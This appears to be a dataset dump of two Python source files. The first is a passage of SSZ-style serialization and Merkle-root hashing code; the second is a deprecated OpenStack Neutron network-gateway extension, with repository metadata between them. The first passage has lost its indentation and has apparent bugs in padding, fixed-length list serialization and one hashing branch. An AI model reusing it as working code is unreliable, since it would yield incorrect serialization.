return isinstance(typ, str) and typ[:4] in ('uint', 'bool')
def is_constant_sized(typ):
if is_basic(typ):
return True
elif isinstance(typ, list) and len(typ) == 1:
return is_constant_sized(typ[0])
elif isinstance(typ, list) and len(typ) == 2:
return False
elif isinstance(typ, str) and typ[:5] == 'bytes':
return len(typ) > 5
elif hasattr(typ, 'fields'):
for subtype in typ.fields.values():
if not is_constant_sized(subtype):
return False
return True
else:
raise Exception("Type not recognized")
def coerce_to_bytes(x):
if isinstance(x, str):
o = x.encode('utf-8')
assert len(o) == len(x)
return o
elif isinstance(x, bytes):
return x
else:
raise Exception("Expecting bytes")
def serialize(value, typ):
if isinstance(typ, str) and typ[:4] == 'uint':
length = int(typ[4:])
assert length in (8, 16, 32, 64, 128, 256)
return value.to_bytes(length, 'little')
elif typ == 'bool':
assert value in (True, False)
return b'\x01' if value is True else b'\x00'
elif (isinstance(typ, list) and len(typ) == 1) or typ == 'bytes':
serialized_bytes = coerce_to_bytes(value) if typ == 'bytes' else b''.join([serialize(element, typ[0]) for element in value])
assert len(serialized_bytes) < 2**(8 * BYTES_PER_LENGTH_PREFIX)
serialized_length = len(serialized_bytes).to_bytes(BYTES_PER_LENGTH_PREFIX, 'little')
return serialized_length + serialized_bytes
elif isinstance(typ, list) and len(typ) == 2:
return ''.join([serialize(element, typ[0]) for element in value])
elif isinstance(typ, str) and len(typ) > 5 and typ[:5] == 'bytes':
assert len(value) == int(typ[5:]), (value, int(typ[5:]))
return coerce_to_bytes(value)
elif hasattr(typ, 'fields'):
serialized_bytes = b''.join([serialize(getattr(value, field), subtype) for field, subtype in typ.fields.items()])
if is_constant_sized(typ):
return serialized_bytes
else:
assert len(serialized_bytes) < 2**(8 * BYTES_PER_LENGTH_PREFIX)
serialized_length = len(serialized_bytes).to_bytes(BYTES_PER_LENGTH_PREFIX, 'little')
return serialized_length + serialized_bytes
else:
print(value, typ)
raise Exception("Type not recognized")
def chunkify(bytez):
bytez += b'\x00' * (len(bytez) % BYTES_PER_CHUNK)
return [bytez[i:i+32] for i in range(0, len(bytez), 32)]
def pack(values, subtype):
return chunkify(b''.join([serialize(value, subtype) for value in values]))
def is_power_of_two(x):
return x > 0 and x & (x-1) == 0
def merkleize(chunks):
tree = chunks[::]
while not is_power_of_two(len(tree)):
tree.append(ZERO_CHUNK)
tree = [ZERO_CHUNK] * len(tree) + tree
for i in range(len(tree)//2-1, 0, -1):
tree[i] = hash(tree[i*2] + tree[i*2+1])
return tree[1]
def mix_in_length(root, length):
return hash(root + length.to_bytes(32, 'little'))
def infer_type(value):
if hasattr(value.__class__, 'fields'):
return value.__class__
elif isinstance(value, list):
return [infer_type(value[0])] if len(value) > 0 else ['uint64']
elif isinstance(value, (bytes, str)):
return 'bytes'
elif isinstance(value, int):
return 'uint64'
else:
raise Exception("Failed to infer type")
def hash_tree_root(value, typ=None):
if typ is None:
typ = infer_type(value)
if is_basic(typ):
return merkleize(pack([value], typ))
elif isinstance(typ, list) and len(typ) == 1 and is_basic(typ[0]):
return mix_in_length(merkleize(pack(value, typ[0])), len(value))
elif isinstance(typ, list) and len(typ) == 1 and not is_basic(typ[0]):
return mix_in_length(merkleize([hash_tree_root(element, typ[0]) for element in value]), len(value))
elif isinstance(typ, list) and len(typ) == 2 and is_basic(typ[0]):
return merkleize(pack(value, typ[0]))
elif typ == 'bytes':
return mix_in_length(merkleize(chunkify(coerce_to_bytes(value))), len(value))
elif isinstance(typ, str) and typ[:5] == 'bytes' and len(typ) > 5:
assert len(value) == int(typ[5:])
return merkleize(chunkify(coerce_to_bytes(value)))
elif isinstance(typ, list) and len(typ) == 2 and not is_basic(typ[0]):
return merkleize([hash_tree_root(getattr(value, field), subtype) for field, subtype in typ.fields.items()])
elif hasattr(typ, 'fields'):
return merkleize([hash_tree_root(getattr(value, field), subtype) for field, subtype in typ.fields.items()])
else:
raise Exception("Type not recognized")
def truncate(container, field_name):
field_keys = list(container.fields.keys())
index = field_keys.index(field_name)
truncated_fields = {
key: container.fields[key]
for key in field_keys[:index]
}
truncated_class = SSZType(truncated_fields)
kwargs = {
field: getattr(container, field)
for field in field_keys[:index]
}
return truncated_class(**kwargs)
def signed_root(container, field_name):
return hash_tree_root(truncate(container, field_name))
| 36.908046 | 132 | 0.625195 |
53299ea2815ea7f31b7a726384972e5c0bd0017a
| 1,376 |
py
|
Python
|
neutron/plugins/vmware/extensions/nvp_networkgw.py
|
yagosys/neutron
|
005fec677c3bf8b2aa0df68c4aedc2b708ec7caf
|
[
"Apache-2.0"
] | 1 |
2016-01-13T14:29:07.000Z
|
2016-01-13T14:29:07.000Z
|
neutron/plugins/vmware/extensions/nvp_networkgw.py
|
yagosys/neutron
|
005fec677c3bf8b2aa0df68c4aedc2b708ec7caf
|
[
"Apache-2.0"
] | null | null | null |
neutron/plugins/vmware/extensions/nvp_networkgw.py
|
yagosys/neutron
|
005fec677c3bf8b2aa0df68c4aedc2b708ec7caf
|
[
"Apache-2.0"
] | 3 |
2015-04-03T08:47:02.000Z
|
2020-02-05T10:40:45.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# TODO(armando-migliaccio): This is deprecated in Icehouse, and
# to be removed in Juno.
from neutron.plugins.vmware.extensions import networkgw
class Nvp_networkgw(networkgw.Networkgw):
"""(Deprecated) API extension for Layer-2 Gateway support."""
@classmethod
def get_name(cls):
return "Neutron-NVP Network Gateway"
@classmethod
def get_alias(cls):
return "network-gateway"
@classmethod
def get_description(cls):
return ("Connects Neutron networks with external "
"networks at layer 2 (deprecated).")
@classmethod
def get_namespace(cls):
return "http://docs.openstack.org/ext/neutron/network-gateway/api/v1.0"
| 32 | 79 | 0.706395 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.